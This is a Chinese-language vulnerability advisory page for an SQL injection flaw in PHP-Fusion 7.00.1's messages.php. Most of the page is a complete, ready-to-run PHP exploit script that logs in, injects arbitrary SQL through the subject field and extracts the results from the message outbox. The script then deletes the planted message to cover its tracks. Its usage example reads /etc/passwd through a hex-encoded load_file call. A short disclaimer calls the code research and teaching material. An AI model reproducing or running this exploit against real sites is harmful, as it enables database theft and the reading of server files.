发布日期：2008-11-20
更新日期：2008-11-25

受影响系统：

PHP-Fusion PHP-Fusion 7.00.1

描述：

---

BUGTRAQ  ID: 32388

PHP-Fusion是一款基于PHP的内容管理系统。

当send_message设置为Send的时候，PHP-Fusion的messages.php文件中没有正确地验证对subject参数的输入便在SQL查询中使用，这允许远程攻击者通过提交恶意请求执行SQL注入攻击。

<*来源：irk4z （irk4z@yahoo.pl）
  
  链接：http://secunia.com/advisories/32781/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php
/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit
requires magic_quotes == off

coded by irk4z[at]yahoo.pl
homepage: http://irk4z.wordpress.com

greets: all friends ;)
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/

$host = $argv[1];
$path = $argv[2];
$login = $argv[3];
$pass = $argv[4];
$sql_injection = $argv[5];

echo
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n".
" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n".
" requires magic_quotes == off\n".
"\n".
" coded by irk4z[at]yahoo.pl\n".
" homepage: http://irk4z.wordpress.com\n".
"\n".
" greets: all friends ;)\n".
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n";

if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){
    echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" .
         "       php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n".
         "       php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n";
    die;
}

echo "Logging into system...";
//login to php-fusion using login and pass
$login_data = send($host, array(    "path" => $path."news.php",
                    "post" => array(
                            "user_name" => $login,
                            "user_pass" => $pass,
                            "login" => "Login"
                            )
                )
            );

//get cookies
preg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches);
$cookies = implode(' ', $matches[1]);

//get user id
preg_match_all("/([0-9])+.([a-zA-Z0-9]{32})/", $cookies, $matches);
$my_id = $matches[1][0];

if(empty($my_id)){
    echo "\n[x] Incorrect login or password..";
    die;
} else {
    echo "[ok]\n";
}

$id_message = uniqid();
$inhex = '';
for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;

echo "Running sql-injection...\n";
//running sql-injection
$res = send($host, array(    "path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&",
                "cookie" => $cookies,
                "post" => array(
                        "send_message" => 'X',
                        "subject" => "X*/,0x{$inhex},                                (SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*",
                        "message" => "XXX"
                        )
            )
        );

echo "Getting data...\n\n";
$res = send($host, array(    "path" => $path."messages.php?folder=outbox",
                "cookie" => $cookies )
            );

preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches);
$id_message_number = $matches[1][0];

$res = send($host, array(    "path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number,
                "cookie" => $cookies )
        );

preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches);

if( empty($matches[1][0]) ){
    echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n";
} else {
    $tmp = '';
    $hex = $matches[1][0];
    //unhex it!
    for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1]));
    echo "DATA: \n".$tmp."\n\n";
}

echo "Deleting message...\n";

$res = send($host, array(    "path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number,
                "cookie" => $cookies,
                "post" => array (
                        "delete" => "Delete"
                        )
            )
        );

//send http packet
function send($host, $dane = "") {
    $packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    
    if( !empty($dane['cookie']) ){
        $packet .= "Cookie: {$dane['cookie']}\r\n";
    }
    
    if( !empty($dane['post']) ){
        $reszta_syfu = "";
        foreach($dane['post'] as $tmp => $tmp2){
            $reszta_syfu .= $tmp . "=" . $tmp2 . "&";
        }
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "Connection: Close\r\n";
        $packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n";
        $packet .= $reszta_syfu;
    } else {
        $packet .= "Connection: Close\r\n\r\n";
    }

    $o = @fsockopen($host, 80);
    if(!$o){
        echo "\n[x] No response...\n";
        die;
    }
    fputs($o, $packet);
    while (!feof($o)) $ret .= fread($o, 1024);
    fclose($o);
    return ($ret);
}

?>

建议：

---

厂商补丁：

PHP-Fusion
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://sourceforge.net/projects/php-fusion/

浏览次数：6418
严重程度：0（网友投票）